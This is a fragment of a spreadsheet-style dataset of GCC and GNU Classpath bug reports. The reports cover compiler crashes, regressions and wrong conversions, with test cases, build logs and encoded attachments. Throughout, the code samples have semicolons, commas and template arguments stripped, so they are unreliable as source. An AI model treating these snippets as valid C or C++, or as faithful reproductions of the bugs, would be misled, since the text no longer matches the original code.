tin:~/src/gnu/gcctest&gt;gcc -O gcc302bug.c
gcc302bug.c: In function `gcc3_profundity':
gcc302bug.c:7: internal compiler error: in fixup_var_refs_1 at function.c:1938
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 3.3 20021030 (experimental)
Environment:
i686-pc-linux-gnu
glibc 2.2.5
Reading specs from /home/gates/pinskia/linux/lib/gcc-lib/i686-pc-linux-gnu/3.3/specs
Configured with: /home/gates/pinskia/src/gnu/gcc/src/configure --target=i686-pc-linux-gnu --enable-__cxa_atexit --prefix=/home/gates/pinskia/linux --enable-threads=posix --enable-shared
Thread model: posix
gcc version 3.3 20021030 (experimental
How-To-Repeat:
compile the following with -O1 or higher (yes this has been on the mailing lists before):
void gcc3_profundity(/* the */ void /* of ignorance */)
{
     double truth = 3.14159 /* ... */ beauty
     beauty = *(
     if (!(&amp;beauty != &amp;truth)) {
     }
}</t>
  </si>
  <si>
    <t>GCC-5478</t>
  </si>
  <si>
    <t>Internal compiler error in `change_address' at emit-rtl.c:1608</t>
  </si>
  <si>
    <t>To expand a BIT_FIELD_REF or a COMPONENT_REF node
expand_expr makes the assumption that the first operand
is a REG or A MEM but in this case the operand is a
CONCAT.
Release:
gcc version 3.0 gcc version 2.95.3
Environment:
Linux Redhat 7.0
Windows 2000 Cygwin 2.78.2.3
How-To-Repeat:
compile rs.c using optimizations:
gcc -O rs.c
gcc -O1 rs.c
gcc -O2 rs.c
gcc -O3 rs.c</t>
  </si>
  <si>
    <t>maltieri</t>
  </si>
  <si>
    <t>GCC-53317</t>
  </si>
  <si>
    <t>Conversion from __int128 to __float128</t>
  </si>
  <si>
    <t>Conversion from __float128 to __int128 does not seem correct in gcc 4.6.3 version (gcc (GCC) 4.6.3 20120306 (Red Hat 4.6.3-2)). I am not aware if this has been fixed in the later version. Here are a few examples: 
Input  = 0x00011002000E38000000080000000000   Result = 0x406F1802000E38000000080000000000
Correct result should be:                     Result = 0x406F1002000E38000000080000000000
Input  = 0x000115260000058B00022A4E00000164   Result = 0x406F3F6E000005EF00022A4E00000164
Correct result should be:                     Result = 0x406F15260000058B00022A4E00000164
Input  = 0x00014810000000000000000000033170   Result = 0x406F4810000331700000000000033170
Correct result should be:                     Result = 0x406F4810000000000000000000033170
Thanks.</t>
  </si>
  <si>
    <t>ahakkas</t>
  </si>
  <si>
    <t>GCC-5685</t>
  </si>
  <si>
    <t>g++ 3.0.2 allows multiple identical declaration of default argument</t>
  </si>
  <si>
    <t xml:space="preserve">	ISO C++ Standard clause 8.3.6 Default arguments says:
	A default argument shall not be redefined by a later declaration (not even to the same value).
	The g++ compiler allows a later declaration to the same value.
Release:
3.0.2
Environment:
System: SunOS ninjin 5.6 Generic_105181-23 sun4u sparc SUNWUltra-80
Architecture: sun4
host: sparc-sun-solaris2.6
build: sparc-sun-solaris2.6
target: sparc-sun-solaris2.6
configured with: ../gcc-3.0.2/configure --prefix=/home/rhu/local/local/gcc-3.0.2 --enable-languages=cc++
How-To-Repeat:
SOURCE CODE foo.cc
#include 
void foo(int int = 0)
void foo(int int = 0)
void foo(int a int b)
{
	std::cout &lt;&lt; a &lt;&lt; std::endl
	std::cout &lt;&lt; b &lt;&lt; std::endl
}
main()
{
	foo(1 2)
	foo(3)
}</t>
  </si>
  <si>
    <t>rhu</t>
  </si>
  <si>
    <t>GCC-60367</t>
  </si>
  <si>
    <t>Default argument object is not getting constructed</t>
  </si>
  <si>
    <t>Created attachment 32234
Preprocessed minimal testcase triggering unexpected behaviour
The attached minimal testcase has the following function with default-constructed default argument:
    void do_something( foo f = {} )
    {
	std::cout &lt;&lt; default argument is at  &lt;&lt; 
    }
The constructor for foo outputs its address I got the following output from a single run:
    constructed foo @ 0x7ffff10bdb7f
    default argument is at 0x7ffff10bdb60
It shows that only 1 foo was constructed and not at the same address as that of the default argument. It's been a loooong week but I can't see anything wrong with the code. In the real code on which this was based a segfault was occurring when running the destructor of a foo that was move-constructed from the default argument because the underlying memory was seemingly uninitialised.
build command &amp; output
----------------------
[rob@localhost tests]$ g++ -v -save-temps -Wall -Wextra --std=c++0x -fno-strict-aliasing -fwrapv -fno-aggressive-loop-optimizations default-args-fail.cpp -o ./default-args-fail
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-redhat-linux/4.8.2/lto-wrapper
Target: x86_64-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --with-linker-hash-style=gnu --enable-languages=cc++objcobj-c++javafortranadagolto --enable-plugin --enable-initfini-array --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-isl=/builddir/build/BUILD/gcc-4.8.2-20131212/obj-x86_64-redhat-linux/isl-install --with-cloog=/builddir/build/BUILD/gcc-4.8.2-20131212/obj-x86_64-redhat-linux/cloog-install --with-tune=generic --with-arch_32=i686 --build=x86_64-redhat-linux
Thread model: posix
gcc version 4.8.2 20131212 (Red Hat 4.8.2-7) (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-Wextra' '-std=c++11' '-fno-strict-aliasing' '-fwrapv' '-fno-aggressive-loop-optimizations' '-o' './default-args-fail' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/libexec/gcc/x86_64-redhat-linux/4.8.2/cc1plus -E -quiet -v -D_GNU_SOURCE default-args-fail.cpp -mtune=generic -march=x86-64 -std=c++11 -Wall -Wextra -fno-strict-aliasing -fwrapv -fno-aggressive-loop-optimizations -fpch-preprocess -o default-args-fail.ii
ignoring nonexistent directory /usr/lib/gcc/x86_64-redhat-linux/4.8.2/include-fixed
ignoring nonexistent directory /usr/lib/gcc/x86_64-redhat-linux/4.8.2/../../../../x86_64-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/x86_64-redhat-linux/4.8.2/../../../../include/c++/4.8.2
 /usr/lib/gcc/x86_64-redhat-linux/4.8.2/../../../../include/c++/4.8.2/x86_64-redhat-linux
 /usr/lib/gcc/x86_64-redhat-linux/4.8.2/../../../../include/c++/4.8.2/backward
 /usr/lib/gcc/x86_64-redhat-linux/4.8.2/include
 /usr/local/include
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-Wextra' '-std=c++11' '-fno-strict-aliasing' '-fwrapv' '-fno-aggressive-loop-optimizations' '-o' './default-args-fail' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/libexec/gcc/x86_64-redhat-linux/4.8.2/cc1plus -fpreprocessed default-args-fail.ii -quiet -dumpbase default-args-fail.cpp -mtune=generic -march=x86-64 -auxbase default-args-fail -Wall -Wextra -std=c++11 -version -fno-strict-aliasing -fwrapv -fno-aggressive-loop-optimizations -o default-args-fail.s
GNU C++ (GCC) version 4.8.2 20131212 (Red Hat 4.8.2-7) (x86_64-redhat-linux)
        compiled by GNU C version 4.8.2 20131212 (Red Hat 4.8.2-7) GMP version 5.1.2 MPFR version 3.1.2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (GCC) version 4.8.2 20131212 (Red Hat 4.8.2-7) (x86_64-redhat-linux)
        compiled by GNU C version 4.8.2 20131212 (Red Hat 4.8.2-7) GMP version 5.1.2 MPFR version 3.1.2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 36de953cba87bab1ad58280401e36d59
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-Wextra' '-std=c++11' '-fno-strict-aliasing' '-fwrapv' '-fno-aggressive-loop-optimizations' '-o' './default-args-fail' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 as -v --64 -o default-args-fail.o default-args-fail.s
GNU assembler version 2.23.2 (x86_64-redhat-linux) using BFD version version 2.23.2
COMPILER_PATH=/usr/libexec/gcc/x86_64-redhat-linux/4.8.2/:/usr/libexec/gcc/x86_64-redhat-linux/4.8.2/:/usr/libexec/gcc/x86_64-redhat-linux/:/usr/lib/gcc/x86_64-redhat-linux/4.8.2/:/usr/lib/gcc/x86_64-redhat-linux/
LIBRARY_PATH=/usr/lib/gcc/x86_64-redhat-linux/4.8.2/:/usr/lib/gcc/x86_64-redhat-linux/4.8.2/../../../../lib64/:/lib/../lib64/:/usr/lib/../lib64/:/usr/lib/gcc/x86_64-redhat-linux/4.8.2/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-Wextra' '-std=c++11' '-fno-strict-aliasing' '-fwrapv' '-fno-aggressive-loop-optimizations' '-o' './default-args-fail' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/libexec/gcc/x86_64-redhat-linux/4.8.2/collect2 --build-id --no-add-needed --eh-frame-hdr --hash-style=gnu -m elf_x86_64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 -o ./default-args-fail /usr/lib/gcc/x86_64-redhat-linux/4.8.2/../../../../lib64/crt1.o /usr/lib/gcc/x86_64-redhat-linux/4.8.2/../../../../lib64/crti.o /usr/lib/gcc/x86_64-redhat-linux/4.8.2/crtbegin.o -L/usr/lib/gcc/x86_64-redhat-linux/4.8.2 -L/usr/lib/gcc/x86_64-redhat-linux/4.8.2/../../../../lib64 -L/lib/../lib64 -L/usr/lib/../lib64 -L/usr/lib/gcc/x86_64-redhat-linux/4.8.2/../../.. default-args-fail.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/lib/gcc/x86_64-redhat-linux/4.8.2/crtend.o /usr/lib/gcc/x86_64-redhat-linux/4.8.2/../../../../lib64/crtn.o</t>
  </si>
  <si>
    <t>rob.desbois</t>
  </si>
  <si>
    <t>CLASSPATH-16040</t>
  </si>
  <si>
    <t>InputEvent.getModifersEx() returns wrong values</t>
  </si>
  <si>
    <t>java.awt.event.InputEvent.getModifiersEx() returns wrong values. I checked for 
MouseEvents (botton clicks) and it returned 0x04 0x08 and 0x10 instead of 
0x0400 0x0800 and 0x1000.</t>
  </si>
  <si>
    <t>GCC-64761</t>
  </si>
  <si>
    <t>[4.9/5 Regression] -freorder-blocks-and-partition causes some failures on SH</t>
  </si>
  <si>
    <t>For SH we have two failures on testsuite
FAIL: gcc.dg/tree-prof/cold_partition_label.c compilation  -fprofile-use -D_PROFILE_USE (internal compiler error)
FAIL: gcc.dg/tree-prof/va-arg-pack-1.c compilation  -fprofile-use -D_PROFILE_USE (internal compiler error)
with -freorder-blocks-and-partition.  Although both test cases
are added at 4.9 they don't fail with 4.8.4 compiler.  So
this is a 4.9/5 regression from 4.8.
In both cases (set (pc) (label_ref ...)) can't be recognized
because CROSSING_JUMP_P (insn) is set.  I've added a new insn
(define_insn *jump_compact_crossing
  [(set (pc)
	(label_ref (match_operand 0  )))]
  TARGET_SH1
   &amp;&amp; flag_reorder_blocks_and_partition
   &amp;&amp; CROSSING_JUMP_P (insn)
{
  /* The length is 16 if the delay slot is unfilled.  */
  return output_far_jump (insn operands[0])
}
  [(set_attr type jump)
   (set_attr length 16)])
to sh.md.  I guess that it's enough ATM though it isn't optimal.
Then we get another failures for both tests like:
  Error: displacement to defined symbol .L10 overflows 8-bit field
from assembler.
It looks almost wrong branches came from follow jump optimization.
Giving SH specific TARGET_CAN_FOLLOW_JUMP target macro as
static bool
sh_can_follow_jump (const rtx_insn * const rtx_insn *)
{
  if (TARGET_SH1
      &amp;&amp; flag_reorder_blocks_and_partition
      &amp;&amp; simplejump_p (branch2)
      &amp;&amp; CROSSING_JUMP_P (branch2))
    return false
  return true
}
could fix them.  Joern had already proposed
https://gcc.gnu.org/ml/gcc-patches/2013-04/msg01332.html
which replaces MD_REDIRECT_BRANCH with TARGET_CAN_FOLLOW_JUMP
and these changes could be merged.  I'll attach the patches
for it.</t>
  </si>
  <si>
    <t>GCC-13925</t>
  </si>
  <si>
    <t>[3.4?/4.0 Regression] Bug while befriending specializations</t>
  </si>
  <si>
    <t>------------------------------------
namespace N {
  template  void f(T)
  namespace M {
    class A {
      friend void f(int)
    }
  }
  template  void f(T) {}
  template  void f(int )
  { 
    f(0)
  }
}
------------------------------------
friend.cc:13: error: expected primary-expression before long
friend.cc:13: error: expected `' before long
Workaround:
   N::f(0)
I cannot check if this is a regression right now. Kriang I guess you want to 
look at it.</t>
  </si>
  <si>
    <t>GCC-50742</t>
  </si>
  <si>
    <t>tree check fail in check_previous_goto_1</t>
  </si>
  <si>
    <t>I just tried to compile the package openvrml-0.18.8-2
on latest trunk snapshot 20111015 on an AMD x86_64 box.
The compiler said
libopenvrml/openvrml/script.cpp: In constructor 'openvrml::script_node::script_node(openvrml::script_node_metatype&amp; const boost::shared_ptr&amp; const node_interface_set&amp; const initial_value_map&amp;)':
libopenvrml/openvrml/script.cpp:2044:30: internal compiler error: tree check: expected tree that contains 'decl minimal' structure have 'tree_list' in check_previous_goto_1 at cp/decl.c:2686
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. No special flags required.</t>
  </si>
  <si>
    <t>CLASSPATH-22669</t>
  </si>
  <si>
    <t>Set close-on-exec flag on all file descriptors</t>
  </si>
  <si>
    <t xml:space="preserve">The Java facilities for fork()'ing and exec()'ing
separate processes are more limited than general UNIX.
Only file descriptors 0 1 and 2 can be meaningfully
inherited by a child process.
Therefore all file descriptors opened in native code
should have fcntl(fd F_SETFD 1) called on them to
set the close-on-exec flag. Otherwise the child process
might muck up the Java file descriptor by moving a file
pointer etc.
This includes both java.io file descriptors as well
as java.net socket file descriptors. The latter are perhaps
more important because a child process can e.g. keep a TCP
connection open indefinitely even though the Java process
has closed it.
</t>
  </si>
  <si>
    <t>CLASSPATH-24359</t>
  </si>
  <si>
    <t>JPopupMenu broken due to BoxLayout/SizeRequirements changes</t>
  </si>
  <si>
    <t>Hello Roman
another change to BoxLayout another breakage: As a testcase try anything
with a JPopupMenu e.g. the imageviewer app I posted to classpath-discuss
earlier... we really need some kind of quality control for things like these.
java.lang.NullPointerException
   at javax.swing.BoxLayout.checkRequirements (BoxLayout.java:356)
   at javax.swing.BoxLayout.checkTotalRequirements (BoxLayout.java:316)
   at javax.swing.BoxLayout.preferredLayoutSize (BoxLayout.java:193)
   at javax.swing.plaf.basic.DefaultMenuLayout.preferredLayoutSize (DefaultMenuLayout.java:75)
   at java.awt.Container.preferredSize (Container.java:666)
   at java.awt.Container.getPreferredSize (Container.java:647)
   at javax.swing.JComponent.getPreferredSize (JComponent.java:1089)
   at javax.swing.JPopupMenu.insert (JPopupMenu.java:280)
   at javax.swing.JPopupMenu.add (JPopupMenu.java:179)
   at javax.swing.JMenu.add (JMenu.java:153)
   at niffler.JImageViewer.createPopup (JImageViewer.java:273)</t>
  </si>
  <si>
    <t>GCC-60603</t>
  </si>
  <si>
    <t>[4.7 Regression] .debug_macinfo/.debug_macro has wrong line numbers for built-in macros</t>
  </si>
  <si>
    <t>The DWARF standard says that macros coming from the command-line
should have line number 0 in the .debug_macinfo data.
I think this ought to apply to built-in macros as well.
Right now gcc gets this wrong and uses a line number of 1.
Here's a test program:
barimba. cat c.c
#define MACRO
int q
Compile like:
barimba. gcc -DCMDLINE -gstrict-dwarf -g3 -c c.c
Now examine the output:
Contents of the .debug_macinfo section:
 DW_MACINFO_define - lineno : 1 macro : __STDC__ 1
...
 DW_MACINFO_define - lineno : 0 macro : CMDLINE 1
 DW_MACINFO_start_file - lineno: 0 filenum: 1
 DW_MACINFO_start_file - lineno: 0 filenum: 2
 DW_MACINFO_define - lineno : 19 macro : _STDC_PREDEF_H 1
 DW_MACINFO_define - lineno : 30 macro : __STDC_IEC_559__ 1
 DW_MACINFO_define - lineno : 31 macro : __STDC_IEC_559_COMPLEX__ 1
 DW_MACINFO_define - lineno : 35 macro : __STDC_ISO_10646__ 201103L
 DW_MACINFO_define - lineno : 38 macro : __STDC_NO_THREADS__ 1
 DW_MACINFO_end_file
 DW_MACINFO_define - lineno : 1 macro : MACRO 
... so gcc gets CMDLINE correct but many other things (IMO) wrong.</t>
  </si>
  <si>
    <t>GCC-80382</t>
  </si>
  <si>
    <t>ICE with error: unrecognizable insn</t>
  </si>
  <si>
    <t>This testcase (which took ~5 days of reducing) ICEs with -O3 -std=c++11 -mtune=power8 -mcpu=power8 -mno-lra:
test.C: In constructor â€˜sbis::rpc::ProcessPool::ProcessPool(const String&amp; sbis::rpc::ProcessPoolType sbis::EventLoopService* sbis::EventReactionService* const String&amp;)â€™:
test.C:195:37: error: unrecognizable insn:
       mSemaphore(U(G()) edCREATE) {}
                                     ^
(insn 16 15 17 2 (set (reg:PTI 169)
        (unspec:PTI [
                (mem/v:TI (plus:DI (reg/f:DI 160 [ this ])
                        (const_int 8 [0x8])) [-1  S16 A128])
            ] UNSPEC_LSQ)) test.C:47 -1
     (nil))
test.C:195:37: internal compiler error: in extract_insn at recog.c:2311
0xcca398 _fatal_insn(char const* rtx_def const* char const* int char const*)
	/home/marek/src/gcc/gcc/rtl-error.c:108
0xcca3c9 _fatal_insn_not_found(rtx_def const* char const* int char const*)
	/home/marek/src/gcc/gcc/rtl-error.c:116
0xc9bcf1 extract_insn(rtx_insn*)
	/home/marek/src/gcc/gcc/recog.c:2311
0xa689f3 instantiate_virtual_regs_in_insn
	/home/marek/src/gcc/gcc/function.c:1589
0xa689f3 instantiate_virtual_regs
	/home/marek/src/gcc/gcc/function.c:1957
0xa689f3 execute
	/home/marek/src/gcc/gcc/function.c:2006
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
namespace std {
template  class allocator
template  struct char_traits
}
typedef int size_t
namespace std {
template  class basic_string {}
}
namespace mpl_ {}
namespace boost {
namespace mpl {
using namespace mpl_
}
}
namespace mpl_ {
struct void_
template  struct bool_
typedef bool_ false_
template  struct bool_ { static const bool value = C_ }
}
namespace boost {
namespace mpl {
template  struct if_c
template  struct if_c {
  typedef T2 type
}
template  struct is_not_void_ : false_ {}
}
}
namespace {
typedef std::basic_string
                          std::allocator&gt;
    String
}
namespace mpl_ {
template  struct size_t { static const ::size_t value = N }
}
namespace std {
typedef enum { memory_order_relaxed } memory_order
template  struct atomic {
  _Tp _M_i
  atomic(_Tp) {}
  _Tp load(memory_order _m) {
    _Tp tmp
    __atomic_load(
  }
}
}
namespace boost {
namespace {
namespace detail {
using std::atomic
using std::memory_order_relaxed
}
using detail::atomic
using detail::memory_order_relaxed
}
namespace parameter {
struct void_
template  struct optional
template  struct parameters { template  struct bind }
template  struct binding
}
namespace lockfree {
namespace tag {
struct fixed_sized
struct capacity
}
namespace detail {
template  struct has_arg {
  typedef parameter::binding type
  static const bool value = mpl::is_not_void_::value
}
template  struct extract_capacity {
  static const bool has_capacity = has_arg::value
  typedef typename mpl::if_c&lt;has_capacity
                             typename has_arg::type
                             mpl::size_t&gt;::type capacity_t
  static const size_t capacity = capacity_t::value
}
template  struct extract_allocator
template 
struct extract_fixed_sized {
  static const bool has_fixed_sized =
      has_arg::value
  typedef
      typename mpl::if_c&lt;has_fixed_sized
                         typename has_arg::type
                         mpl::bool_&gt;::type type
  static const bool value = type::value
}
template  class tagged_ptr {
  typedef size_t tag_t
  T *ptr
  tag_t tag
}
template  class freelist_stack {
public:
  typedef tagged_ptr tagged_node_handle
  template  freelist_stack(Allocator)
}
template  struct compiletime_sized_freelist_storage
template  struct runtime_sized_freelist_storage
template  class fixed_size_freelist
template &lt;typename T typename Alloc bool IsCompileTimeSized bool IsFixedSize
          size_t Capacity&gt;
struct select_freelist {
  typedef mpl::if_c&lt;IsCompileTimeSized
                    compiletime_sized_freelist_storage
                    runtime_sized_freelist_storage&gt;
      fixed_sized_storage_type
  typedef typename mpl::if_c&lt;IsFixedSize
                             fixed_size_freelist
                             freelist_stack&gt;::type type
}
typedef parameter::parameters&gt;
    queue_signature
}
template  class queue {
  typedef detail::queue_signature::bind bound_args
  static const bool has_capacity =
      detail::extract_capacity::has_capacity
  static const size_t capacity = detail::extract_capacity::capacity
  static const bool fixed_sized =
      detail::extract_fixed_sized::value
  static const bool compile_time_sized = has_capacity
  struct node
  typedef detail::extract_allocator node_allocator
  typedef
      typename detail::select_freelist&lt;node node_allocator compile_time_sized
                                       fixed_sized capacity&gt;::type pool_t
  typedef typename pool_t::tagged_node_handle tagged_node_handle
  struct implementation_defined {
    typedef size_t size_type
  }
public:
  typedef typename implementation_defined::size_type size_type
  queue(size_type)
      : head_(tagged_node_handle()) tail_(tagged_node_handle()) pool(1) {
    head_.load(memory_order_relaxed)
  }
  atomic head_
  atomic tail_
  pool_t pool
}
}
}
namespace sbis {
namespace rpc {
enum ProcessPoolType : int
}
class EventLoopService
class EventReactionService
namespace rpc {
enum ExchangeDirection : int
class NamedSemaphore {
public:
  NamedSemaphore(String ExchangeDirection)
}
class ProcessPool {
  ProcessPool(const String &amp; ProcessPoolType EventLoopService *
              EventReactionService * const String 
  boost::atomic mStarted
  boost::lockfree::queue mNotifies
  boost::atomic mNumberOfProcesses
  boost::atomic mNumberOfThreads
  boost::atomic mNumberOfExtraProcesses
  boost::atomic mMaximumQueueSize
  boost::atomic mRequestQueueSize
  NamedSemaphore mSemaphore
}
}
}
namespace boost {
namespace uuids {
struct uuid {}
}
}
namespace sbis {
namespace rpc {
enum ExchangeDirection : int { edCREATE }
}
boost::uuids::uuid G()
String U(boost::uuids::uuid)
namespace rpc {
ProcessPool::ProcessPool(const String &amp; ProcessPoolType EventLoopService *
                         EventReactionService * const String &amp;)
    : mStarted(false) mNotifies(0) mNumberOfProcesses(0) mNumberOfThreads(1)
      mNumberOfExtraProcesses(0) mMaximumQueueSize(0) mRequestQueueSize(0)
      mSemaphore(U(G()) edCREATE) {}
}
}</t>
  </si>
  <si>
    <t>GCC-221</t>
  </si>
  <si>
    <t>Internal compiler error in gcc 2.96/20000501 [test case attached]</t>
  </si>
  <si>
    <t xml:space="preserve"> --wEMma7ioTxnRzrJh
 Content-Type: text/plain charset=us-ascii
 [Resend: I've _twice_ sent this to gcc-bugs and to gcc-gnats but not received
 the automated response and not been allocated a bug tracking number.]
 gcc version:                                                                    
 	GNU C++ version 2.96 20000501 (experimental) (sparc-sun-solaris2.5.1)
 	compiled by GNU C version 2.96 20000501 (experimental) 
         [previous versions of 2.96 also demonstrate this behaviour]             
 o/s versions:                                                                   
         SunOS 5.5.1 sun4u sparc SUNWUltra-Enterprise                           
 compiler options:                                                               
         none specified.                                                         
 command line:                                                                   
         gcc -v --save-temps bug.cc &gt; &amp; ! gcc-out                                
 bug.cc bug.ii gcc output:                                                     
         see attached.   
 --wEMma7ioTxnRzrJh
 Content-Type: application/x-gunzip
 Content-Disposition: attachment filename=bug.cc.gz
 Content-Transfer-Encoding: base64
 H4sICLoPETkCA2J1Zy5jYwCNUdlSwkAQfHa/YqRKSTCRU0UDVGm8DzyIeFA8BHYDWxWyqezG
 s/h3d7OAqC/uQzI1PdPdNY0EmcShL0hjGPqcg+u1kK46dNIRCY1GHvpEIF+cDkI63MvqlRdG
 MfgYG65XsIBGwnTQ1EHoD50FupK8agfJnQ4dRQS304nxrdGQwuswSAMLPOAWpBHPpiDxMX0z
 ZxZciYlETvU4/SAsMLgJBajDBpT7DhSLssR0RAWHmCQweBdEWgOucAhYAmJMIG/nZ1wFIBGG
 5ozSWXRjxmVXYro1YCwE7abrh2oeGlDSGA3AWEBm1tJO1VMsNteDU5T9MPs1U7BtLZcrlSvV
 2tb2Tn13/8A9PDo+OT07v7i8al/f3N51vPvuw+PTc67HYU2fpO8s6RSbujnXUt/XMQ2JdAer
 TSiZ/7C7sCIvtEwkb7OpkpaglV3MVhdSeSMdacDYcpKL6PiYJaKl9uf5/Qg/C7tStaCmub4A
 UPSEMosCAAA=
 --wEMma7ioTxnRzrJh
 Content-Type: application/x-gunzip
 Content-Disposition: attachment filename=bug.ii.gz
 Content-Transfer-Encoding: base64
 H4sICF0QETkCA2J1Zy5paQCNUclOwzAQPeOvGIKgSUhKN6CQthKEfSlLQlmqHrLXUhpXcQII
 1H/HjttQEAd8sEczb94bz1uDOkhuHlU9T0IoCybT2MmCjhc7lIJp95CILDyxshQnkY0+EbAz
 zd0Ye/tFvPJKsA+O78umrWqAk0wx0Mz4g04DETFe3oNYj4WjJPD7+UT+1ugw4Q1w81ADG6gG
 eUILFKSOj9+V+Qgmq2UpQw0p/ghIKFMFVGjDJtRHBsAco0KQ+NCdQ40yOyWUZVlNpFxCYhAq
 AyfmeOhATdRwCHJZUoqUmIAfzqJTAZyh4vHJL4yq60JOqtUbzdb2zm577+DQPDo+OT07v7i8
 uu7f3N7dW/bD4PHp+UUaUlgXXx0ZSzpbXZFcaPH7bYzjgE0Hq12oKf8YtxyloleWidhuqtxB
 VtSKjel8Q9xHJKwKCVl2qLSEjkma9Xj/wpcfphYmNpoatATXF2IEAV1wAgAA
 --wEMma7ioTxnRzrJh
 Content-Type: application/x-gunzip
 Content-Disposition: attachment filename=gcc-out.gz
 Content-Transfer-Encoding: base64
 H4sICF0QETkCA2djYy1vdXQApVTvT9swEP3ev+LEpNGqxCkFpq0CpCqrGBIrVVvYpGkKbuIm
 lhw7+EcL//3OblP6ASYkKqX2Pb/3cvZdPGU057IAU7PMwFKrCmLDq7iMiyyL+z38nfWOY8EX
 Hoj8aGqqs8g4GRklqOamT87Icdwn377EwaaFTFgxbbiS4GFofKDNnmqmecWkpaLT+tC7srqG
 SFBZRFm3C9EKou9pejW+S9L0ot8EV/tBkv68Ht9OEcKcdthkOE9+3IzuRze40At4Vgtn/INR
 SMGPTuK/k/wpUMxKn6ZpmM7up6cbzFO3INK3My9pwLdEjWQngGhono1lVdtHnZfQW3QCbfQ7
 GU3m17fj2WYvSZKOR7/S++F0OL2a+dcMs9q1g783qGhWcskaYOEKgnXyA+ctPAlIJpN3lQ3a
 ePRYHazf1qz1ictMuJzBASHkAAxDtARjqbYGSqbZ4IVyjpTLVymvtsNWFhfdbnSCFGd0LFRG
 RbPysS76r8kbwheNT6aJRjIHtWw2Jrix5IMNnh2HHtyUCKJHx5mFKHdVvaCGNRWMmppFKkBm
 U0z8Jt5XzNdT6ECmqpoLlsPiGYLju/xIa5PWAK4lLJ3MrFc8rBTPgeb5jBeS5WNXQXvGq5nV
 ePnMz5P5JXw+gvkROGkCY+fCpe3AnzW3JSRzuABTKm13NL+MOsRx8vdw0MhOvg4AEMP2kpZT
 i8xwt/k+azj9U5+jZVpS0WxWA9NaaVTCAzqmlcpZulQ6TA6PgNp9tbFK4w30rJwlHuntL04E
 80UyblFxCxTPQghfH9Csxi2Qfe6M4WdxN70ZlNbWgzher9ekkI4oXcRGLe2aahZ6CDWGlLYS
 l4BZ7Vv4vWoXTtuQ1j9mCa/v1wUAAA==
 --wEMma7ioTxnRzrJh--
Release:
unknown</t>
  </si>
  <si>
    <t>msf</t>
  </si>
  <si>
    <t>GCC-14260</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] default arguments are only permitted for function parameters</t>
  </si>
  <si>
    <t>Hi  
testcase:  
== Cut == 
template  
class T 
{ 
public: 
        T(shortshort f=0) {} 
        T(int f) {} 
        T(int f=0const char* b=0) {} 
} 
=== Cut === 
produces : 
$  g++ -v -Wall -ansi -pedantic -c kircfunctors.cpp  
.. 
gcc version 3.4.0 20040220 (prerelease) 
... 
kircfunctors.cpp:7: error: default arguments are only permitted for function 
parameters 
kircfunctors.cpp:7: error: default arguments are only permitted for function 
parameters 
Something is inconsistent here.. either it should reject declaration 2 
and 3 or none of them (like gcc 3.3.x does for me). The diagnostic is  
showing that it has some problems parsing this correctly.</t>
  </si>
  <si>
    <t>GCC-80064</t>
  </si>
  <si>
    <t>[7 Regression] _Iter_cmp_iter instantiates bogus type</t>
  </si>
  <si>
    <t>The following testcase extracted from Cython is no longer accepted with G++7:
&gt; g++-7 -c t.C
In file included from /usr/include/c++/7/bits/stl_algobase.h:71:0
                 from /usr/include/c++/7/algorithm:61
                 from t.C:1:
/usr/include/c++/7/bits/predefined_ops.h: In instantiation of â€˜struct __gnu_cxx::__ops::_Iter_comp_iterâ€™:
/usr/include/c++/7/bits/stl_heap.h:394:51:   required from â€˜void std::make_heap(_RAIter _RAIter _Compare) [with _RAIter = __gnu_cxx::__normal_iterator &gt; _Compare = bool(int int)]â€™
t.C:8:34:   required from here
/usr/include/c++/7/bits/predefined_ops.h:132:16: error: field â€˜__gnu_cxx::__ops::_Iter_comp_iter::_M_compâ€™ invalidly declared function type
       _Compare _M_comp
                ^~~~~~~
while it is just fine with g++6:
&gt; g++-6 -c t.C
&gt;</t>
  </si>
  <si>
    <t>GCC-8388</t>
  </si>
  <si>
    <t>GCC- internal compiler error</t>
  </si>
  <si>
    <t>when I try to make or make all the sources of Kismet (www.kismetwireless.net) newer and older versions I get an internal compiler error :
g++ -Ilibpcap-2002.07.02 -O2 -Wall -DVERSION_MAJOR=2 -DVERSION_MINOR=6
-DVERSION_TINY=2 -g -O2 -g -O2 -c speech.cc -o speech.o 
/usr/include/g++/bits/basic_string.h: In function `std::string 
ExpandSpeechString(std::basic_string 
std::allocator &gt; const packet_info* int)': 
/usr/include/g++/bits/basic_string.h:338: Internal compiler error in 
expand_call at calls.c:3049 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
make: *** [speech.o] Error 1
Release:
gcc-3.2
Environment:
